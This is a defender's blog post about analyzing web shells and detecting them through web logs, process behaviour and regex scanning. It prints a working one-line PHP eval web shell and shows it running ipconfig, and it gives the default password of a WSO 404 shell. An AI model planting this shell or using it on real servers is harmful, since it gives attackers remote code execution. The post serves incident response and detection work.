Skip to main content

Analyzing and detecting web shells

Of the various pieces of malware i’ve analyzed, I still find web shells to be the most fascinating. While this not a new topic, i've been asked by others to do a write up on web shells, so here it is ;). 

For those new to web shells, think of this type of malware as code designed to be executed by the web server - instead of writing a backdoor in C, for example, an attacker can write malicious PHP and upload the code directly to a vulnerable web server. Web shells span across many different languages and server types. Let's take a looks at some common servers and some web extensions:

Operating System
Service
Binary Name
Extensions
Windows
IIS (Internet Information Services)
w3wp.exe
.asp/.aspx
Windows/Linux
apache/apache2/nginx
httpd/httpd.exe/nginx
.php
Windows/Linux
Apache Tomcat*
tomcat*.exe/tomcat*
.jsp/.jspx

Web shells 101

To better understand web shells, let’s take a look at a simple eval web shell below:

<?php ${${eval($_POST[potato])}};?>

This is a very simple yet dangerous eval web shell that I still see in use to this day in targeted engagements (.asp or .aspx equivalent eval web shell on IIS). This PHP web shell will take any arbitrary PHP code assigned to the POST variable potato and evaluate it. Let see how this would work in the real world. Let’s say an attacker has found a way to create the PHP file a.php inside your web directory.
Viewing the a.php web shell inside of notepad++.

Once the php file is created, we can begin issuing commands to the web shell. Lets see what happens when  we issue a simple ipconfig. To issue this POST request, we’ll be using a tool called Postman



Now that we have our form data added, http method set to POST and the full path of our php shell in the address bar, we click Send. The output should be as follows:
As you can see from the output above, our web shell was able to process the php code and run ipconfig. Not bad for 32 bytes… 

In some cases, attackers may use web shells that accept parameters over a GET request. If this is case, you should be able to review your web logs and pick out the requests that have suspicious parameters. Here's an example of the same web shell using a GET request rather then a POST request: 
To make matters worse, if you were to visit that web page using any web browser and view its source code, all you would see is below:

This is because the PHP code is server side, not client side. For the sake of this exercise, we used Postman to issue commands to this eval web shell. While this approach does work, some attackers use a more graphical interface. The following screenshots below are images of the Caidao frontend setup to use our eval shell, a.php. This shows how a simple eval web shell can be used to populate a full GUI application.






Another great write up on eval web shell usage can be found at the following link below:
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html  

Detecting the eval web shell
One method of detection is to review web logs for suspicious GET requests. In the previous example, we make a GET request to our web shell, attempting to execute our ipconfig command. 

::1 - - [22/Aug/2018:12:42:00 -0400] "GET /dashboard/images/a.php?potato=ipconfig HTTP/1.1" 200 553 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 

We can clearly see in the apache access.log the ipconfig command being passed as a parameter to the a.php web shell. However, if we inspect one of the POST requests, we won’t see any of the parameters:

192.168.89.1 - - [22/Aug/2018:13:03:10 -0400] "POST /dashboard/images/a.php HTTP/1.1" 200 847 "-" "PostmanRuntime/7.2.0"

The reason we don’t see the potato parameter is its being passed in the body of the HTTP request, which the access.log doesn’t capture. So what else can we do to find this web shell? Let’s go down the list of some basic web shell detection methods:


Parameter detection
As we alluded to in the previous example, web shells can sometimes be found based on the GET parameters being passed to them. Depending on the host OS of your web server, you can look for suspicious commands inside your web logs. For Windows, we may look for cmd.exe, ipconfig or whoami, while in Linux we could search for bash, ifconfig or uname. While this is a long shot, i’ve had some luck at finding shells but most of the time I just find web scanners hitting every page or looking for known shells by issuing TONS of requests to the web server.. Nikto, for example, is usually very noisy and floods the access.log with these requests, which makes detecting shells using parameter detection not very effective. 

Frequency analysis
With most production web servers, you can typically see a trend on what files are accessed along with any parameters, status codes and bytes transferred. When it comes to frequency analysis, you have many ways to mix and mold the data to find anomalies. In some cases, reviewing the number of requests made to a single resource can be effective, for larger server deployments, that “stack” might be very large and take awhile to process.

Data Transferred
If your web server logs bytes per request (if it doesn’t, enable it!), sorting by byte I/O can help identify anomalous data transfers that may indicate an attacker using a shell to upload additional malware to your web server or downloading data from the server. We frequently identify data exfil in GET requests wherein an attacker has stored data on the web server for easy downloading. 

Source IP
Looking at only the source ip addresses accessing your web server and grouping them by pages accessed may yield some anomalies, we should enrich the records with GeoIP to help add additional grouping.

File names and location
In some cases, attackers that create new web shells that may use non-standard naming conventions such as c99.php or a.php. In other cases, they will put web shells in non-standard web directories (like we did for our eval web shell example, images directory).

Default file mods
In many cases, attackers don’t create a new file for their web shell. Recently, we saw attackers append an eval web shell to the default iisstart.htm. This is a default html file for an IIS install. However, when attackers modify this default file, the modified timestamp will be updated. For older IIS deployments (months/years), a default file like iisstart.htm being modified a week ago seems suspicious.

Process behaviour
This is my personal favorite, as I still use it on my day-to-day. When an attacker uses a web shell to run other binaries on disk, the process they run will actually be a child of the web server process and run under the same user context as the server. Let’s take another look at our eval web shell example from above:
We can clearly see cmd.exe is invoked first, followed by ipconfig.exe. To better understand this detection, lets use Procmon.exe (Process Monitor) to monitor the httpd.exe for Process Create events. I’ve included the filter below:
Now if we make another request to our web shell with the same POST request, we should see the following record appear in Process Monitor:


ProTip
A good way to detect most web shells is to look for web server process like w3wp.exe and httpd.exe who have unusual child processes such as cmd.exe or /bin/bash. Depending on your website you may have some false positives (especially on Linux), I recommend tuning out normal bash commands.

Regex detection
While the process based detection is effective at identifying web shells at the time of use, attackers have been known to implant a web shell on servers and only use it as a backup method of ingress. We’ve seen this before in incident response engagements where customers successfully remove all of the attacker’s backdoors and reset passwords used for VPN access however the customer neglected to check for web shells. The attacker, having lost access to their backdoors used a web shell created on a DMZ server. Thankfully, the customer had an EDR solution in place and was using the behaviour detection mentioned above. However, without real time process monitoring in place, we can use regex to detect some common strings inside these web shells such as eval or exec. Once tool that i’ve used in the past on Linux web server (with Python already installed) is the NeoPI scanner: https://github.com/Neohapsis/NeoPI. However, this utility is that it's not something you can just drop on any OS and run it as it requires Python to be installed. Yes we could use Py2Exe to generate an Windows executable from this Python script, but that swells up the file size and isn’t very performant as writing the same thing in Go (https://golang.org/). During incident response, having a code base that cross compiles, supports static compilation and runs natively on the system to utilize all system resources makes all the difference. It’s for these reasons (among many others) why I chose to write my web shell detector in Go. While the code is far from perfect (as i’m still new to Go), it’s a good primer on regex scanning for web shells in a cross platform environment with formatted output (json or pipe separated) so it can be integrated into any pipeline. When I wrote this utility, I used the following web shell repository to baseline the regex included in the project (kudos to @OMGAPT for the regex):
https://github.com/tennc/web shell

 Checkout the project below if you wanna take it for a test drive:

Fully featured web shells
While the eval web shell is my favorite for its pure simplicity and capability, many other web shells have a user interface and a handful of baked in tools. Also, most of these shells have a basic level of authentication to deny others on the internet access to the shell. Let's take a quick look at a 404 WSO web shell. If we happen to visit this type of web shell with any browser, it appears to look like a standard 404 web page your typical web server would send.   

Lets type in another random file name in the address bar and see what is returned:
Interesting.. so this server is returning two different 404 pages? Let’s take a look at the page source code for 404.php. You can do this by right clicking on the page and selecting View page source




This action should open up a new tab with the HTML source code visible, as shown below: 


It appears this PHP page has an input field which accepts a password. Let’s take another looks at the page but this time, let’s perform a Select All like we’re going to copy the site text or your your mouse cursor to highlight everything.


We can clearly see we have an input field. If I put some text in this field, it becomes more visible. 
Since I already know the password for this web shell (404, how secure?!), I’ll type it in and submit by pressing enter.
File manager view of a 404 WSO web shell

Now that we passed the authentication layer, we are presented the web shell. I won’t go into each tab, but you can clearly see it comes pre-baked with alot of tools such as SQL, bruteforce, file manager and Exec, to name a few. Having encountered many variants of these shells in the wild, the next question is always “How did the attacker get the web shell on the server in the first place?!”....



Making life harder
Of course not every web shell is as simple as the eval web shell or 404 WSO web shell. In some cases, even if you get a copy of the shell, it may take some work to expose the original source code to understand its functionality. Many commodity web shells use some form of armor to make static review of the code difficult. Some techniques include:
  • Encrypted web shells (P.A.S web shell)
  • Layers upon layers of obfuscation including gzinflate, base64, chr, ord, concatenation. Trying to decode these web shells by hand is a tedious task.

Appendix:

Tools

Webshell-scan: https://github.com/tstillz/webshell-scan

Special Thanks

Mike Scutt @OMGAPT for the awesome web shell regex, feedback and mentoring.

Comments

Popular posts from this blog

Revealing malware relationships with GraphDB: Part 1

In this post, we will learn how using a Graph Database like Neo4j can help visualize malware relationships and extend these relationships to identify patterns between samples. Before we dig into Neo4j, let’s start with some fundamental graph terminologies:   
Nodes represent entities such as a human, car, laptop or phone. Properties are attributes nodes can contain. A steering wheel or tires would be a property of the “car” node. Labels are a way to group together nodes of a similar type. For example, a label of “FastFood” may include nodes such as “Taco Bell, McDonald’s, and Chipotle”. Edges (or vertices) represent the relationship connection between two nodes. Relationships can also have their own properties. Getting started with Neo4jLink: https://neo4j.com/
Neo4j is a Graph Database commonly known for its pure simplicity and easy to use interface. I find the structure of a graph database quite fascinating, on top of learning how to normalize malware analysis data for each sample into a …

Introduction to Malware Analysis

Why malware analysisMalware analysis (“MA”) is a fun and excited journey for anyone new or seasoned in the career field. Taking a specimen (malware sample) and reverse engineering it to better understand its inner workings can be a long, tedious adventure. With the sheer number of malware samples circulating the internet, in addition to the various formats specimens are found in, makes malware analysis a good challenge. Outside of learning MA as a hobby, here are some other reasons why we perform malware analysis:To better understand how a specimen works. This may yield certain unique attributes about how the malware was written, methods it performs or its dependencies.To collect intelligence and build Indicators of Compromise (“IOCs”), usually comprised of Host Based Indicators (“HBIs”) and/or Network Based Indicators (“NBIs”).For general knowledge or research purposes.How do I get started?!If you’re new to malware analysis, you want to ensure you’ve taken the right precautions befor…